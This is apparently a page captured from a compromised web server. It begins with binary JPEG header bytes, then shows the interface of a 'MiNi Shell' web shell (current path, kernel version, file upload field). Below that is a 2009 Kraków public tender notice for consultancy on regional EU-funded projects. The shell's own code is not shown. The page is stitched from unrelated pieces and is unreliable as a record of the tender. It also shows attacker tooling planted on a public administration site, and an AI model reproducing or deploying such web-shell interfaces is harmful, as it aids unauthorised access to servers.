JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27409-N-2009.html

<p class="kh_header"><b>Kraków: Świadczenie usług specjalistycznego doradztwa na rzecz potencjalnych beneficjentów projektów współfinansowanych w ramach Małopolskiego Regionalnego Programu Operacyjnego (MRPO) na lata 2007-2013 (w ramach Małopolskiego Project Pipeline - druga edycja)</b><br>
<b>Numer ogłoszenia: 27409 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Małopolskie , ul. Basztowa 22, 31-156 Kraków, woj. małopolskie, tel. 012 4300394, 6303408,6303122, faks 012 6160144,6303126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malopolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług specjalistycznego doradztwa na rzecz potencjalnych beneficjentów projektów współfinansowanych w ramach Małopolskiego Regionalnego Programu Operacyjnego (MRPO) na lata 2007-2013 (w ramach Małopolskiego Project Pipeline - druga edycja).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług specjalistycznego doradztwa na rzecz potencjalnych beneficjentów projektów współfinansowanych w ramach Małopolskiego Regionalnego Programu Operacyjnego (MRPO) na lata 2007-2013 (w ramach Małopolskiego Project Pipeline - druga edycja).


Przedmiotem zamówienia jest świadczenie usług specjalistycznego doradztwa na rzecz potencjalnych beneficjentów projektów współfinansowanych w ramach Małopolskiego Regionalnego Programu Operacyjnego (MRPO) na lata 2007-2013 (w ramach Małopolskiego Project Pipeline - druga edycja). Zamówienie składa się z 2 części:

Część 1 zamówienia obejmuje usługi doradcze dla potencjalnych beneficjentów Działania 3.1 Rozwój infrastruktury turystycznej, Schemat B. Inwestycje w obiekty i infrastrukturę uzdrowiskową - 
540 godzin usług doradczych,

Część 2 zamówienia obejmuje usługi doradcze dla potencjalnych beneficjentów Działania 2.1 Rozwój 
i podniesienie konkurencyjności przedsiębiorstw, Schemat C Dotacje dla instytucji otoczenia biznesu - 360 godzin usług doradczych

1. Uzasadnienie realizacji projektu
W ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 (MRPO)
zapewnione zostały moSliwości dofinansowania szeregu przedsięwzięć o relatywnie
nowatorskim charakterze. Dotyczy to obszarów inwestowania, w których dotychczasowe
doświadczenia małopolskich instytucji są niewielkie lub ich brak - w szczególności dotyczy
to braku doświadczeń w przygotowaniu i realizacji projektów współfinansowanych środkami
wspólnotowymi.
Mając to na względzie, Instytucja Zarządzająca MRPO opracowała mechanizmy wsparcia
beneficjentów przygotowujących tego typu trudne (ze względu na złoSony charakter,
otoczenie prawne lub wysoki poziom innowacyjności) projekty. Wsparcie to będzie
finansowane ze środków Osi Priorytetowej 9. Pomoc techniczna MRPO, i jako takie jest
traktowane jako działanie mające na celu pomoc Instytucji Zarządzającej w osiągnięciu
zakładanych celów i wskaźników realizacji MRPO. Zachodzi bowiem obawa, że bez
specjalnego podejścia do trudnych obszarów programu, beneficjenci nie będą w stanie przygotować odpowiednio wysokiej jakości projektów, a przez to możliwości płynące z programu nie zostaną efektywnie wykorzystane. Istnieje również zagrożenie, że beneficjenci przygotowujący ciekawe i wartościowe przedsięwzięcia nie dopełnią obowiązków w zakresie opracowania wymaganej dokumentacji, przez co z przyczyn formalnych ich projekty mogłyby zostać odrzucone.
2. Ogólne określenie przedmiotu zamówienia
2.1. Przedmiotem zamówienia są usługi polegające na doradztwie w sporządzaniu oraz
weryfikacji prawidłowości sporządzenia dokumentacji niezbędnej do złożenia wniosku o dofinansowanie ze środków Europejskiego Funduszu Rozwoju Regionalnego (oraz opcjonalnie z budżetu państwa) w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, zwane dalej Usługami doradczymi.
2.2. Usługi doradcze będą realizowane na terenie Województwa Małopolskiego przez okres nie dłuższy niż 6 miesięcy od dnia zawarcia umowy pomiędzy Zamawiającym a Wykonawcą. Zakończenie realizacji świadczenia usług doradczych może nastąpić wcześniej
w wyniku wyczerpania limitu godzin dla poszczególnych części zamówienia, określonych w pkt. 3.1.1. Miejscem świadczenia usług doradczych będzie siedziba potencjalnego Beneficjenta tych usług lub inne miejsce wskazane przez potencjalnego Beneficjenta (np. siedziba Wykonawcy), pod warunkiem, że będzie ono zlokalizowane na terenie Województwa Małopolskiego.
2.3. Docelowa grupa odbiorców/beneficjenci usług doradczych:
Projekt ma na celu wsparcie potencjalnych beneficjentów Małopolskiego
Regionalnego Programu Operacyjnego na lata 2007-2013, należących do typu
beneficjentów wskazanych w Uszczegółowieniu Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 (dokument przyjęty Uchwałą Zarządu Województwa Małopolskiego nr 938/07 z dnia 27 listopada 2007 r., z późn. zm.), przygotowujących dokumenty niezbędne do aplikowania o wsparcie w ramach działań/schematów MRPO
wskazanych w punkcie 3.1.
2.4. Potencjalni beneficjenci, którzy będą odbiorcami usług doradczych świadczonych przez ich Wykonawcę/Wykonawców zostaną wyłonieni i wskazani Wykonawcy/Wykonawcom
przez Zamawiającego. (W celu wyłonienia odbiorców usług doradczych Instytucja
Zarządzająca MRPO przeprowadzi otwarty nabór zgłoszeń. Spośród zainteresowanych podmiotów - potencjalnych beneficjentów MRPO, o których mowa w pkt 2.3, zostaną wyłonieni odbiorcy usług doradczych. Wykonawca/Wykonawcy/ zostanie powiadomiony
przez Zamawiającego na piśmie o wyłonionych odbiorcach usług doradczych i zakresie doradztwa, o jakie ubiegał się każdy z nich.. Zakłada się, że zainteresowane podmioty będą
mogły ubiegać się o maksymalnie 60 godzin usług doradczych.
2.5. Językiem umowy w sprawie niniejszego zamówienia publicznego będzie język polski.
Cała oficjalna korespondencja i dokumenty przygotowane będą w języku polskim.
3. Szczegółowe określenie przedmiotu zamówienia
3.1. Przedmiot zamówienia - ilość godzin usług doradczych
3.1.1. Zamówienie obejmuje łącznie 900 godzin usług doradczych i zostało podzielone na
następujące części:
a) Część 1: świadczenie usług doradczych dla potencjalnych beneficjentów Działania 3.1.
Rozwój infrastruktury turystycznej Schemat B. Inwestycje w obiekty i infrastrukturę
uzdrowiskową - 540 godzin usług doradczych,
b) Część 2: świadczenie usług doradczych dla potencjalnych beneficjentów Działania 2.1
Rozwój i podniesienie konkurencyjności przedsiębiorstw, Schemat C Dotacje dla instytucji otoczenia biznesu - 360 godzin usług doradczych.
3.1.2. Jednostką pomiaru wykonanych usług doradczych i jednocześnie jednostką stosowaną do rozliczeń za wykonane usługi doradcze jest (godzina świadczenia usług doradczych).
Przez godzinę usług doradczych rozumie się 60 minut efektywnego świadczenia usług doradczych, tj. faktycznego wykonywania czynności objętych niniejszym zamówieniem, w miejscu, o którym mowa w pkt. 2.2, bez względu na ilość osób zaangażowanych w doradztwo po stronie Wykonawcy, tj. niezależnie od tego, czy usługę wykonuje jedna osoba czy też cały zespół. W skład godziny świadczenia usług doradczych nie wlicza się czasu dojazdu
Wykonawcy do siedziby Beneficjenta, czasu poświęconego na zorganizowanie pracy
Wykonawcy ani czasu poświęconego na inne czynności niezbędne do świadczenia usług doradczych, nie polegających na ich wykonywaniu. W szczególności nie wlicza się czasu poświęconego przez Wykonawcę na weryfikację dokumentacji sporządzonej przez Beneficjenta, która odbywa się poza miejscem świadczenia usługi, o którym mowa w pkt 2.2 i
bez udziału przedstawicieli Beneficjenta, jak również czasu poświęconego przez Wykonawcę na sporządzenie raportu, o którym mowa w pkt 3.2.1.
Zaoferowana przez Wykonawcę cena jednostkowa za godzinę usług doradczych powinna uwzględniać wszelkie koszty ponoszone przez Wykonawcę/Wykonawców w związku z realizacją usług doradczych, takie jak np. koszty dojazdów, koszty prowadzenia biura i inne koszty ogólne ponoszone przez Wykonawcę, wynikające z realizacji zamówienia.
3.2. Przedmiot zamówienia - charakterystyka zamawianych usług.
3.2.1. W przypadku, gdy potencjalny Beneficjent dysponuje przygotowanymi
dokumentami Wykonywanie usług doradczych polegać będzie na:
a) weryfikacji oraz opiniowaniu dokumentów przygotowanych przez potencjalnego
Beneficjenta lub na jego zlecenie, niezbędnych do złożenia wniosku o dofinansowanie ze środków MRPO;
Weryfikacja będzie prowadzona pod kątem:
zgodności z wymogami stawianymi przez Instytucję Zarządzającą MRPO, w tym
w szczególności zawartymi w dokumentach programowych, w regulaminach konkursu (jeśli w czasie realizacji usług doradczych będzie ogłoszony konkurs dla danego działania/schematu MRPO) oraz w wytycznych IZ MRPO;
zgodności z prawem (polskim i wspólnotowym), w tym w szczególności
w odniesieniu do Ustawy Prawo zamówień publicznych, polskich i wspólnotowych
regulacji dotyczących ochrony środowiska oraz do zasad udzielania pomocy
publicznej określonych w regulacjach krajowych i wspólnotowych,
 zgodności z wytycznymi ministra rozwoju regionalnego określającymi zasady
postępowania w związku z realizacją programów operacyjnych współfinansowanych
ze środków Unii Europejskiej, podanymi do publicznej wiadomości na stronie
internetowej:
http://www.mrr.gov.pl/Dokumenty+oficjalne (Okres+programowania+2007-
2013/Wytyczne+MRR/Horyzontalne+obowiazujace),
b) zdefiniowaniu dalszych działań potencjalnego Beneficjenta prowadzących do
realizacji wszystkich wymogów związanych z przygotowaniem wniosku o
dofinansowanie ze środków MRPO.
Przed przystąpieniem do realizacji usługi Wykonawca sporządzi listę sprawdzającą, w oparciu o którą realizował będzie czynności określone w pkt 3.2.1 lit. a-b. , i przekaże ją na piśmie w terminie 10 dni roboczych od dnia podpisania umowy Zamawiającemu do akceptacji. Lista sprawdzająca opracowana będzie przez Wykonawcę jednorazowo dla danej
części zamówienia, przed przystąpieniem do świadczenia usług doradczych i zawierać będzie wszystkie elementy niezbędne do świadczenia usługi w ramach danej części zamówienia.
Wykonawca zobowiązany jest rozpocząć realizację usługi w terminie 21 dni od daty
wskazania przez Zamawiającego potencjalnego Beneficjenta i zakresu świadczonych usług.
Za dzień rozpoczęcia świadczenia usługi przyjmuje się dzień, w którym odbyło się pierwsze spotkanie Wykonawcy z potencjalnym Beneficjentem.
Wykonawca, w oparciu o listę sprawdzającą zrealizuje czynności o których mowa w pkt. 3.2.1. lit. a-b, i po ich przeprowadzeniu przekaże potencjalnemu Beneficjentowi oraz Zamawiającemu pisemny raport z wyniku weryfikacji. Jeśeli raport będzie zawierał uwagi i zastrzeżenia, Wykonawca udzieli doradztwa w zakresie prawidłowego sporządzenia dokumentów.
3.2.2. W przypadku, gdy potencjalny Beneficjent nie dysponuje przygotowanymi
dokumentami świadczenie usługi polegać będzie na doradztwie Wykonawcy przy
sporządzaniu dokumentów przez potencjalnego Beneficjenta. W żadnym wypadku
świadczone usługi doradcze nie będą polegać na sporządzeniu przez Wykonawcę
dokumentacji niezbędnej do aplikowania w ramach MRPO.
3.2.3. W zakresie, o którym mowa w punkcie 3.1.1. usługi doradcze, których charakter określono w punktach 3.2.1 i 3.2.2. dotyczyć będą następujących rodzajów dokumentów:
a) wniosku o dofinansowanie w ramach MRPO;
b) załączników do wniosku o dofinansowanie, w tym studium wykonalności (lub biznesplanu);
c) innych niezbędnych dokumentów aplikacyjnych;
d) raportu o oddziaływaniu na środowisko.
3.2.5. Szczegółowy zakres usług doradczych świadczonych poszczególnym potencjalnym beneficjentom zależny będzie od zapotrzebowania zgłoszonego przez potencjalnego Beneficjenta Instytucji Zarządzającej MRPO. O osobie potencjalnego Beneficjenta oraz zakresie doradztwa Zamawiający poinformuje Wykonawcę na piśmie. Potencjalni Beneficjenci będą mogli ubiegać się o maksymalnie 60 godzin usług doradczych przeznaczonych dla jednego potencjalnego Beneficjenta, w ramach danej części zamówienia.
W szczególnie uzasadnionych przypadkach, na pisemny wniosek Wykonawcy i po
konsultacjach z potencjalnym Beneficjentem i Wykonawcą Zamawiający dopuszcza
moSliwość zwiększenia limitu godzin świadczonych usług.
3.2.6. Zamawiający zapłaci Wykonawcy wynagrodzenie za faktycznie zrealizowane usługi doradcze, wg zaproponowanych w ofercie stawek za godzinę świadczenia usług na podstawie protokołu sporządzonego przez Wykonawcę, podpisanego przez potencjalnego Beneficjenta i Wykonawcę, potwierdzającego wymiar czasowy zrealizowanych usług. Wzór protokołu z realizacji usługi stanowi załącznik nr 8 do niniejszej specyfikacji.
3.2.7. Świadczenie usług doradczych będzie wykonywane wyłącznie przez osoby (zespoły
osób), o których mowa w punkcie VI ppkt 2 specyfikacji istotnych warunków zamówienia, wskazane w ofercie Wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.41.10.00-8, 72.22.40.00-1, 73.22.00.00-0, 71.31.00.00-4, 71.31.30.00-5, 71.31.34.40-1, 90.71.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Dla części 1 zamówienia 3 000 zł, słownie: trzy tysiące złotych,
Dla części 2 zamówienia 2 000 zł, słownie: dwa tysiące złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający wymagania określone w art. 22 ust. 1 ustawy, w tym spełniają następujące warunki szczegółowe:
2.	Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia:. 

	Dla części 1 zamówienia:
Wykonawca musi dysponować personelem składającym się z zespołu co najmniej czterech osób, posiadających następujące doświadczenie

	co najmniej jedną osobą,  która zarządzała co najmniej dwoma projektami 
z zakresu inwestycji w infrastrukturę turystyczną lub tworzenia produktów turystycznych, 
             co najmniej jedną osobą, która przygotowała co najmniej dwie analizy ekonomiczne lub finansowe dla projektów współfinansowanych ze środków Unii Europejskiej,
	co najmniej jedną osobą, która wykonała samodzielnie co najmniej jedną usługę polegającą na sporządzeniu projektu budowlanego lub dokumentacji wykonawczej budynku użyteczności publicznej, który otrzymał pozwolenie na budowę o powierzchni użytkowej nie mniejszej niż 2 000 m2,
	co najmniej jedną osobą, która opracowała co najmniej dwa raporty o oddziaływaniu przedsięwzięcia na środowisko, na środowisko, o których mowa 
w ustawie z 27.04.2001 r. Prawo ochrony środowiska (Dz.U. z 2006 Nr 129, poz. 902 ze zm.), dla przedsięwzięć mogących znacząco oddziaływać na środowisko, wymienionych w § 2 ust 1 Rozporządzenia Rady Ministrów z dnia 9 listopada 2004r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu o oddziaływaniu na środowisko (Dz. U. Nr. 257, poz. 2573, oraz z 2007r. Dz. U. Nr 158, poz. 1105). Ponadto osoba ta powinna posiadać doświadczenie pozwalające na sporządzenie raportu o oddziaływaniu przedsięwzięcia na środowisko zgodnie z ustawą z dnia 3.10.2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227), ustawą Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150) oraz  ustawą o ochronie przyrody (Dz.u. z 2004 r. Nr 92, poz. 880, z późn. zm.). 

	Dla części 2 zamówienia:
Wykonawca musi dysponować personelem składającym się z zespołu co najmniej czterech osób, posiadających następujące doświadczenie:

	co najmniej jedną osobą,  która zarządzała co najmniej dwoma projektami 
z zakresu rozwoju usług wspierających sektor małych i średnich przedsiębiorstw,
	co najmniej jedną osobą, która przygotowała co najmniej dwie analizy ekonomiczne lub finansowe dla projektów współfinansowanych ze środków Unii Europejskiej,
	co najmniej jedną osobą, która wykonała samodzielnie co najmniej jedną usługę polegającą na sporządzeniu projektu budowlanego lub dokumentacji wykonawczej budynku użyteczności publicznej, który otrzymał pozwolenie na budowę o powierzchni użytkowej nie mniejszej niż 2 000 m2,
	co najmniej jedną osobą, która opracowała co najmniej dwa raporty o oddziaływaniu przedsięwzięcia na środowisko, o których mowa w ustawie z 27.04.2001 r. Prawo ochrony środowiska (Dz.U. z 2006 Nr 129, poz. 902 ze zm.), dla przedsięwzięć mogących znacząco oddziaływać na środowisko, wymienionych w § 2 ust 1 Rozporządzenia Rady Ministrów z dnia 9 listopada 2004r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu o oddziaływaniu na środowisko (Dz. U. Nr. 257, poz. 2573, oraz z 2007r. Dz. U. Nr 158, poz. 1105). Ponadto osoba ta powinna posiadać doświadczenie pozwalające na sporządzenie raportu o oddziaływaniu przedsięwzięcia na środowisko zgodnie z ustawą z dnia 3.10.2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227), ustawą Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150) oraz  ustawą o ochronie przyrody (Dz.u. z 2004 r. Nr 92, poz. 880, z późn. zm.), 

Przez doświadczenie w zarządzaniu projektami, o którym mowa powyżej należy rozumieć doświadczenie, łącznie w planowaniu zadań i tworzeniu struktury podziału prac w zespole, koordynowaniu działań związanych z realizacją danego projektu, a także kierowaniu oraz kontrolowaniu pracy zespołu osób realizujących projekt (pełnienie funkcji kierownika lub menadżera lub koordynatora lub lidera projektu).

Przez budynek użyteczności publicznej, o którym mowa powyżej należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji.

3. Wykonawca musi się wykazać doświadczeniem w wykonaniu, w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia publicznego a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług polegających na sporządzeniu lub doradztwie przy sporządzeniu:

Dla części 1 zamówienia:

1) dwóch studiów wykonalności lub biznesplanów dla projektów w zakresie inwestycji w infrastrukturę turystyczną lub tworzenia produktów turystycznych, każdy o wartości wykonanych usług min. 
15 000 zł;
2) dwóch raportów o oddziaływaniu przedsięwzięcia na środowisko dla projektów 
z zakresu budowy lub przebudowy obiektów budowlanych, każdy o wartości wykonanych usług  min. 15 000 zł;


Dla części 2:
1) dwóch studiów wykonalności lub biznesplanów dla projektów w zakresie rozwoju usług wspierających sektor małych i średnich przedsiębiorstw, każdy o wartości wykonanych usług min. 15 000 zł;
2) dwóch raportów o oddziaływaniu przedsięwzięcia na środowisko dla projektów z zakresu budowy lub przebudowy obiektów budowlanych, każdy o wartości wykonanych usług  min. 15 000 zł.

4.	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej:

a) w zakresie części I:   50 000 zł
     b) w zakresie części II:  50 000 zł

5.	 Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - niespełnia, w oparciu o dokumenty załączone do oferty, a których wykaz zawiera punkt VII niniejszej specyfikacji. 

6.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna), ustanawiając pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). W takim przypadku warunki udziału w postępowaniu, dotyczące wykonawcy, odnoszą się odpowiednio do wykonawców, którzy ubiegają się wspólnie o zamówienie publiczne. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się 
o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wraz z ofertą wykonawca winien złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu - zał. nr 3 do siwz oraz dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert,
b)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, (przy uwzględnieniu wymagań określonych w pkt VI ppkt 3 SIWZ - 
w odniesieniu do części zamówienia na którą składana jest oferta), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - zał. nr 6 oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie,
c)	polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w wysokości określonej w pkt VI ppkt 4 (odpowiednio dla części zamówienia, na którą składana jest oferta),  
d)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (przy uwzględnieniu wymagań określonych w pkt VI ppkt 2 SIWZ - w odniesieniu do części zamówienia na którą składana jest oferta) - zał. nr 7. 
e)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeśli w wykazie, o którym mowa w literze d) wykonawca wskazał osoby, którymi będzie dysponował,


2. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o zamówienie, każdy z wykonawców, musi załączyć do oferty dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, mając na uwadze, że warunki w zakresie wymaganego doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia, wykonawcy mogą spełniać łącznie.

